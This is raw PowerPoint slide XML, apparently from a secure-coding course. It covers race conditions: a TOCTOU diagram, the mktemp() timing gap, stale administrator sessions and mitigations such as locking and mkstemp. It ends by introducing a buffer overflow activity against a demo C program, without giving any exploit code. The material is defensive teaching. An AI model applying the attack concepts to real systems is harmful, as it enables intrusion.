                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shared Value:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933700" y="5220441"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="5220441"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562044" y="4655041"/>
            <a:ext cx="1178528" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Process A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="26" name="Diagram 25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2057400" y="5630195"/>
          <a:ext cx="3733800" cy="6858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7" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901879" y="5788429"/>
            <a:ext cx="838692" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Process B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295900" y="5220441"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="5068036"/>
            <a:ext cx="0" cy="24465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981200" y="5068036"/>
            <a:ext cx="0" cy="24465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209800" y="5477795"/>
            <a:ext cx="0" cy="26035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410200" y="5477795"/>
            <a:ext cx="0" cy="26670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295900" y="2186355"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="TextBox 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="2186355"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Arrow Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="2040514"/>
            <a:ext cx="0" cy="24465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981200" y="2040514"/>
            <a:ext cx="0" cy="24465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4566763" y="2460211"/>
            <a:ext cx="0" cy="26035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7467600" y="2460211"/>
            <a:ext cx="0" cy="26670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 Box 307"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124561" y="1043105"/>
            <a:ext cx="87244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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Expected Outcome</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text Box 307"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124562" y="4014392"/>
            <a:ext cx="2438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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Unexpected Outcome</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{873B8B83-EB33-421A-8AAF-B6EB35545E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438900" y="1219200"/>
            <a:ext cx="2171700" cy="492543"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>TOCTOU EXAMPLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3831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BF533-A10D-4611-9584-ABA5AE013384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DD6FBF-0E9E-466F-A061-E62E3FB2C48E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You might use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mktemp()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function to generate a temporary file name, and then create a file of that name. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is a delay time between creating the name and then creating the actual file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker could potentially insert a malicious file by the same name which your application will use. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider using the Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module and use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkstemp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if you need to generate temporary files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race conditions are often non-deterministic and hard to debug.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F78F5B5-E4EF-4A06-8606-19A9B55F33DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race Condition (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17503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BF533-A10D-4611-9584-ABA5AE013384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DD6FBF-0E9E-466F-A061-E62E3FB2C48E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you write multi-processing or multi-threading code, always consider that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timing may not be completely consistent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If errors occur, a process or thread may not even complete successfully.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You need to account for what happens when these problems occur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race conditions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often involve just a fraction of a second.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May also occur over a longer period of time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User is granted administrative access to a web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User logs in to an administrative session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the meantime, his administrative rights are revoked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since he is already logged in as an administrative user, he continues to have full access to the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does the system check the access rights that are on record every time the user issues a command?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, his access would be limited immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, there is a potential security problem.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F78F5B5-E4EF-4A06-8606-19A9B55F33DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impact of Race Conditions on Threading/Multiprocessing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3607598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Race Conditions</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2819400" y="1307130"/>
            <a:ext cx="5982676" cy="5025732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lock the shared resource when the process is modifying it, and unlock it when the process is done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can get quite complicated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: An error occurs in the process that has locked the resource, so you will deadlock other processes that use that resource. In some cases, it may be preferable to leave the resource locked than to continue in an undefined state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write code that doesn't depend on side effects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A side effect is when a function changes a variable outside of its own scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible, only modify data inside of the local scope of the thread or process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write temporary files in a data store that is available only to a single thread or process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research best practices for writing multiple threading or multiple processing code in the language and system you are developing in. Tools you might use (if available) include semaphores, mutexes, and others.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Python's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkstemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to generate temporary files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="2866669" cy="1143000"/>
            <a:chOff x="2362200" y="1048169"/>
            <a:chExt cx="4183232" cy="1667941"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2362200" y="1048169"/>
              <a:ext cx="4183232" cy="1667941"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="76200" dir="8100000" sy="-23000" kx="800400" algn="br" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="22000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2971800" y="1476375"/>
              <a:ext cx="1143001" cy="404215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Thread 1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4857750" y="1636695"/>
              <a:ext cx="1143001" cy="404215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Thread 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CC38CC9-CB1B-4E7A-B09A-A818AF48A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2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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performing a buffer overflow attack on a server-based application can be a very complex exercise. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The effort is worthwhile to an attacker, though, as the benefits can be significant, such as providing the attacker with access to a command shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To get a sense of the general steps involved in such an attack, you will attempt to overflow the input in a very simple demo application written in C.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Performing a Memory-Based Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
